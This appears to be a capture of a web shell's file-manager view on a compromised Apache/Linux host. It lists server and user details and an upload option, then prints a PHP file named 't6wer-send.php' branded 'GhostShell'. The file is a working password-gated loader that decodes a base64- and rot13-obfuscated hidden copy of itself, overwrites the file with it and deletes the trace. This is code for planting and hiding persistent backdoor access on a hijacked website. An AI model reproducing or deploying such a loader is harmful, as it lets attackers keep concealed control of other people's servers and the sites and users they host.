HEX
Server: Apache
System: Linux bd12.noc223.com 4.18.0-553.121.1.lve.el8.x86_64 #1 SMP Thu Apr 30 16:40:41 UTC 2026 x86_64
User: handcraf (1693)
PHP: 8.1.28
Disabled: NONE
$ pwd: /home/handcraf/www/
Upload Files
File: /home/handcraf/www/t6wer-send.php
<?php
// GhostShell Protected File
$hashed_password = '$2a$12$CpYcpG5yYmQbzhjxgtqqO.C.AguMSzc2NvVowyebgxnuhRKimRqke';
$access = false;

if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST["password"])) {
    if (password_verify($_POST["password"], $hashed_password)) {
        $access = true;
        $backup = __FILE__ . '.ghostshell';
        if (file_exists($backup)) {
            $enc = file_get_contents($backup);
            $dec = str_rot13(base64_decode($enc));
            file_put_contents(__FILE__, $dec);
            unlink($backup);
            echo "<script>location.reload();</script>";
            exit;
        }
    }
}

if (!$access) {
    echo '<!DOCTYPE html>
    <html>
    <head>
        <title>GhostShell</title>
        <style>body{background:#000;color:#0f0;font-family:Courier;padding:50px;text-align:center;}</style>
    </head>
    <body>
        <h1>GhostShell Protected</h1>
        <form method="POST">
            <input type="password" name="password" placeholder="Password" required>
            <button type="submit">Decrypt</button>
        </form>
    </body>
    </html>';
    exit;
}
?>
@ Telegram